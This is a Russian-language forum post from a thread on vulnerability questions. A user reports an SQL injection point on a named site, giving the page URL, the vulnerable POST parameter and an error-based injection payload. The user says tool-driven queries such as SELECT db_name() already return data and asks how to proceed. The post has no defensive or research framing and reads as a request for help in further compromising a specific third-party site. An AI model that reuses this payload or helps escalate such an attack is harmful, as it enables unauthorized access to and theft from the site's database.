Тема
:
Ваши вопросы по уязвимостям.
Показать сообщение отдельно
#
5
07.06.2018, 18:48
adirasta
Новичок
Регистрация: 03.02.2011
Сообщений: 0
С нами:
8037686
Репутация:
0
есть sql типа:
URL :
https://site.ru/uuurs.aspx?ctl00$menubartop$txtSearch=&ctl00$menub artop$btnsearch=%u0916%u094b%u091c
Parameter Name : ctl00%24ContentPlaceHolder1%24txt_uuursName
Parameter Type : POST
Attack Pattern : %27AND+1%3dcast(0x5f21403264696c656d6d61+as+varcha r(8000))+or+%271%27%3d%27
что делать? через софт запросы типа SELECT db_name() отвечает
adirasta
Посмотреть профиль
Репутация
Найти все сообщения от adirasta
Добавить в друзья
